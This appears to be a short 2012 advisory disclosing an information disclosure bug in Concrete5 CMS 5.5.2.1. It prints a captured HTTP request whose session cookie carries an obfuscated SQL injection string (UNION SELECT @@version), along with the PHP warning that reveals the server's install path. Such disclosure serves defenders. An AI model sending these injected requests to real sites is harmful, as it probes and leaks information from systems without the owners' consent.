[ TITLE ....... ][ Concrete5.5.2.1 CMS information disclosure bug [ DATE ........ ][ 22.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://www.concrete5.org/ [ VERSION ..... ][ 5.5.2.1 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? Information disclosure bug. [--------------------------------------------[ [ 3. Where is bug :) (...raw cut from Burp...) GET /concrete5.5.2.1/index.php/search/?search_paths%5B%5D=&query=aaaaaaaaaaaa&submit=Search HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (...) Referer: http://concrete-host/concrete5.5.2.1/index.php/search/ Cookie: CONCRETE5=%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d0%2f%2a%2a%2fUNION%2f%2a%2a%2fALL%2f%2a%2a%2fSELECT%2f%2a%2a%2f@@version,%2f%2a%2a%2f2--; (...)=(...); PHPSESSID=phpsessid Connection: close (...end cut...) Hm :) So answer is (for vulnerable php.ini of course): "
Warning: session_start() [function.session-start]: The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /www/concrete5.5.2.1/concrete/startup/session.php on line 32
(...) " [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.concrete5.org/ - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ Ask me about new projects @ mail. ;) ] [ Best regards [